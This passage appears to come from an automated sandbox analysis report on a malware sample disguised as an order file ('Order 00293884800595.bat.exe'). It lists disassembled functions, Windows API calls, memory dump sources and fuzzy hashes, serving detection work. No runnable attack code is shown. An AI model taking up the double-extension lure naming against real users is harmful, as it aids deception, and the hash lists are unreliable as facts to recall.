CharNextA.USER32(00000000), ref: 00405CCB
CharNextA.USER32(00000000), ref: 00405CDF

Strings

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 00405CB9

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
API String ID: 3213498283-4121408785
Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A

Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
GetTickCount.KERNEL32 ref: 00402EFE
CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED

Function 00405345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405374
CallWindowProcA.USER32(?,?,?,?), ref: 004053C5

Part of subcall function 00404379: SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040438B

Strings

, xrefs: 00405355

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E

Function 00403A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,763F3410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
GlobalFree.KERNEL32(0069BC70), ref: 00403A22

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-787714339
Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9

Function 00405C66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order 00293884800595.bat.exe,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order 00293884800595.bat.exe,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A

Strings

C:\Users\user\Desktop, xrefs: 00405C66

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3443045126
Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD

Function 6CA510E0 Relevance: 5.1, APIs: 4, Instructions: 144memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6CA5116B
GlobalAlloc.KERNEL32(00000040,?), ref: 6CA511D8
GlobalFree.KERNEL32(?), ref: 6CA51286
GlobalFree.KERNEL32(00000000), ref: 6CA5129B

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b1365357912af0dd11e1483ae74698baaaaad2ad15f4b62d1784eb78eb788dc3
Instruction ID: f3fff5ea853af56e8b5a0c4c30671a5fd6bf408c3ab15e6d69d9893934589133
Opcode Fuzzy Hash: b1365357912af0dd11e1483ae74698baaaaad2ad15f4b62d1784eb78eb788dc3
Instruction Fuzzy Hash: 8151E7B5601306AFDB04CF68C984A7A7BF4FB06348BD8C469E646C7710E734E9A5CB51

Function 00405D85 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C

Analysis Process: Order 00293884800595.bat.exePID: 8160, Parent PID: 9012COMMON

Executed Functions

Function 0015F500 Relevance: 8.0, Strings: 6, Instructions: 545COMMON

Download Yara Rule

Strings

$~q, xrefs: 0015FC23
$~q, xrefs: 0015FBD6
$~q, xrefs: 0015FC0B
$~q, xrefs: 0015FBE2
$~q, xrefs: 0015FC2F
$~q, xrefs: 0015FBFF

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q$$~q$$~q
API String ID: 0-2846834050
Opcode ID: bd8ba12be93cc2b66796e4a4e26dc392c4496b44623285dfea99750ea25917d7
Instruction ID: aeff2f550ead5e3a8e3e9e4fa5b9964ab325488c6ce7627fccf1c16573d22747
Opcode Fuzzy Hash: bd8ba12be93cc2b66796e4a4e26dc392c4496b44623285dfea99750ea25917d7
Instruction Fuzzy Hash: DE323131E1061ACBCB14DFB5C85459DF3B2FFD9300F61866AD419AB215EB30AD85CB80

Function 35FB3C88 Relevance: 3.0, Strings: 2, Instructions: 472COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB4238
$~q, xrefs: 35FB422C

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q
API String ID: 0-37811640
Opcode ID: 7ed33a33489e35fdecfac80279f26d27d3984fe64d932ad18e4bf32f6c6b9795
Instruction ID: f377a39f0cc61fab3f5a475eeb5ce67d8ead0178ff0b2e6d85792e1d2ba4d0c8
Opcode Fuzzy Hash: 7ed33a33489e35fdecfac80279f26d27d3984fe64d932ad18e4bf32f6c6b9795
Instruction Fuzzy Hash: 2C029C74B00609CFDF08DFA5D594A5EB7B2FF88340F158969E806AB385DBB1DC468B90

Function 00158C98 Relevance: 2.8, Instructions: 2842COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f65e0f7a5feeebf56a47aab0934273b462888892f3c1c70c8c52d281d9b6ad
Instruction ID: 077e74d8fdf13b9182aba2ba6d4165e9ed2e0ea1bd68086797c182452cf09d26
Opcode Fuzzy Hash: 24f65e0f7a5feeebf56a47aab0934273b462888892f3c1c70c8c52d281d9b6ad
Instruction Fuzzy Hash: D263E831D10B1ACADB11EB68C8945A9F7B1FF99300F11D79AE4587B121EB70AAC5CF81

Function 0015E718 Relevance: 1.0, Instructions: 1030COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c079292914770794cb553f361b22f423e8213b4619c16c9dc87c815e23c73cbc
Instruction ID: 190f7f7a60bd6b1b0657d56b152433fe77fcebe2f74c40dc1bd3a0eee8961422
Opcode Fuzzy Hash: c079292914770794cb553f361b22f423e8213b4619c16c9dc87c815e23c73cbc
Instruction Fuzzy Hash: 3B92F634A00204CFDB28DB68C584A5DB7F2FB49315F5584A9E859AF361DB35ED8ACF80

Function 35FB24F0 Relevance: .8, Instructions: 816COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b439c1d43ff7ca27b3a094cbf497052e630d4c1b645803c54292ac078a4095a5
Instruction ID: 1b9b689b18b606d916a9ee873e09ded2c2fd71abc877ecede817c322a8ff9e64
Opcode Fuzzy Hash: b439c1d43ff7ca27b3a094cbf497052e630d4c1b645803c54292ac078a4095a5
Instruction Fuzzy Hash: 8E626834B00204CFDB04DBA9D594A9DB7B2FF88350F548969E806AB395DBB5ED42CB80

Function 35FB1B38 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996499d6640b688451bd1e7fd011be8b9f94190b335c11d1731f314fe0e1565a
Instruction ID: c961a79f4945e3973e56591a85e715729251aba9ecd467ed3a946d02580f4502
Opcode Fuzzy Hash: 996499d6640b688451bd1e7fd011be8b9f94190b335c11d1731f314fe0e1565a
Instruction Fuzzy Hash: 7512B179F00255DBEF14EB65D880A9EB7A2FB85350F10887AD806DB385DB74EC45CB90

Function 0015C100 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8be663c59ace112cefa6083003ec5c8a1c8886ce553453826a04494785d0d0f
Instruction ID: 5c48d70f02471f661c97a2a8c0e44e13c6c798689d7c2930a5158dda4741f646
Opcode Fuzzy Hash: b8be663c59ace112cefa6083003ec5c8a1c8886ce553453826a04494785d0d0f
Instruction Fuzzy Hash: 9F327C71D00719CEDB15DF68C890AAEF7B1FF99300F15C6AAD459AB251EB30E985CB80

Function 35FB7160 Relevance: .6, Instructions: 564COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea6989f379b606118a79c3fb8b98542cbb23031e5be2ea57412351c3ef20a25
Instruction ID: cdde2d6bc3121a69de40c46899f8bb1ec9c2d1f50fdcb7a97346efaaebac31e6
Opcode Fuzzy Hash: 3ea6989f379b606118a79c3fb8b98542cbb23031e5be2ea57412351c3ef20a25
Instruction Fuzzy Hash: 98224D78E01109CFEF14CA69C480B9EB7B2FB89350F658D26E445EB391DB74ED818B91

Function 001580B4 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbf51f940fa76cfbda0cdfa4745536b1d1378159a972c3e1a476f9e00aa8932
Instruction ID: 08f0c4e4c26f1ab070c161e399cd89b165bae41b48f246356281d3c9c33f0a92
Opcode Fuzzy Hash: fdbf51f940fa76cfbda0cdfa4745536b1d1378159a972c3e1a476f9e00aa8932
Instruction Fuzzy Hash: 2CD17F74A00205CFCB14DBA8D594AADBBB2FF88311F248469E816EB391DF35DD46CB90

Function 001544E0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c3871f25676ba816524cb5cf6744faf6dfbfd6758868ec5b93ad02ba8b9007
Instruction ID: 6b9a329966dfe7a146f32e8709e00a5da340bdc6b7c09671f8560294d1477fb2
Opcode Fuzzy Hash: 99c3871f25676ba816524cb5cf6744faf6dfbfd6758868ec5b93ad02ba8b9007
Instruction Fuzzy Hash: C1B17070E00209CFDF14CFA9D8917ADBBF2AF49719F148529D825EB254EB749889CB81

Function 001538C8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e3a29fed329888f316c7ad46a1d88686fac8d181c8a18ad8089dd6e464c348b
Instruction ID: e4563c7057af5659891b79b6ee12d0300321c4551e0c93e8ca4b49aafa60dc9a
Opcode Fuzzy Hash: 5e3a29fed329888f316c7ad46a1d88686fac8d181c8a18ad8089dd6e464c348b
Instruction Fuzzy Hash: FB919170E00209DFDF14CFA9C8817EDBBF2AF88355F148129D865EB294EB749949CB91

Function 35FB6C08 Relevance: 10.4, Strings: 8, Instructions: 391COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB6DE1
$~q, xrefs: 35FB6D89
$~q, xrefs: 35FB6D7D
$~q, xrefs: 35FB6D29
$~q, xrefs: 35FB6DD5
$~q, xrefs: 35FB6DB8
$~q, xrefs: 35FB6DAC
$~q, xrefs: 35FB6D35

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q
API String ID: 0-2858235012
Opcode ID: 32df19a4e0de9e97f00728e33c0ad28ae9ac5271e7df218d8f00306246d456e8
Instruction ID: 87f31a49f93db31cd9726c31b8f6ee7c56dc589405b3bb9b76286465cdc625bf
Opcode Fuzzy Hash: 32df19a4e0de9e97f00728e33c0ad28ae9ac5271e7df218d8f00306246d456e8
Instruction Fuzzy Hash: BAE15C74A00219CBDF19DBA9C490A9EB7B2FF89351F208969D806AB354DF71DC46CB90

Function 35FB7588 Relevance: 8.0, Strings: 6, Instructions: 471COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB7AD6
$~q, xrefs: 35FB7ACA
$~q, xrefs: 35FB7B32
$~q, xrefs: 35FB7B3E
$~q, xrefs: 35FB7B0A
$~q, xrefs: 35FB7AFE

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q$$~q$$~q
API String ID: 0-2846834050
Opcode ID: 8e0d36e73c5f3f165a2b351e3881e0de1e963c5189c67440e5bede57279aa6b1
Instruction ID: c52d93e0cc5e047c4e5022d1f6206acea125a520b95cee94bfbdc61a01d04e0c
Opcode Fuzzy Hash: 8e0d36e73c5f3f165a2b351e3881e0de1e963c5189c67440e5bede57279aa6b1
Instruction Fuzzy Hash: 27026C74E01209CBEF14CBAAC480A9EB7B2FB45350F608D6AD405EB355DBB1ED46CB91

Function 35FB5068 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB50D8
$~q, xrefs: 35FB5113
$~q, xrefs: 35FB50E4
$~q, xrefs: 35FB511F

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q
API String ID: 0-2080730351
Opcode ID: 004a741e1a6f7aef966d9b7e620f6595e35094cb83278cd45a0c58f6216ae736
Instruction ID: 3f28c1e1407be4aef6791b549ce6d28830383a1d57784e9ef909bde0f4f3baf9
Opcode Fuzzy Hash: 004a741e1a6f7aef966d9b7e620f6595e35094cb83278cd45a0c58f6216ae736
Instruction Fuzzy Hash: EB914074B0061ACBDF18DB65D890BAEB3F6FBC8340F508969C409EB344EB749D468B94

Function 35FB8E78 Relevance: 4.5, Strings: 3, Instructions: 798COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB926F
$~q, xrefs: 35FB9277
$~q, xrefs: 35FB9283

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q
API String ID: 0-835092581
Opcode ID: 98703abf448953da8de5247c319b2f900d6f3a4235e608f4c6167c16c53f1fa9
Instruction ID: e810a8df0c8a824549bce708901cfd018d479535d46b5d46e13f5adb927164a3
Opcode Fuzzy Hash: 98703abf448953da8de5247c319b2f900d6f3a4235e608f4c6167c16c53f1fa9
Instruction Fuzzy Hash: 97623770E1020ACFCB15DBA8C59194EBBB2FF85311F608A69D406AF359DB71ED46CB84

Function 35FB505A Relevance: 2.7, Strings: 2, Instructions: 170COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB50D8
$~q, xrefs: 35FB5113

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q
API String ID: 0-37811640
Opcode ID: 1957c885189268462b2e009c015ad76258fbd8587b18cf7862fc82c6d22d324a
Instruction ID: 3e87fd0890bfb6c2378d0793455cd4d272fb7d45311dd40b605a446f4f8fcd4c
Opcode Fuzzy Hash: 1957c885189268462b2e009c015ad76258fbd8587b18cf7862fc82c6d22d324a
Instruction Fuzzy Hash: 79513074B00206CFDF48DB75D8A1BAEB3F6EBC8350F548869C406EB344EA759C468B94

Function 00155050 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

LR~q, xrefs: 0015514B

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: LR~q
API String ID: 0-151050133
Opcode ID: 3e29bee4c3e32791b9c918be86f32d0e1a4bf15756fca15001b0cb5ce63864fc
Instruction ID: 32048420a0a4aa2bccc3fc717f17f6dc9e0b130d047c43efb09c98eae741415a
Opcode Fuzzy Hash: 3e29bee4c3e32791b9c918be86f32d0e1a4bf15756fca15001b0cb5ce63864fc
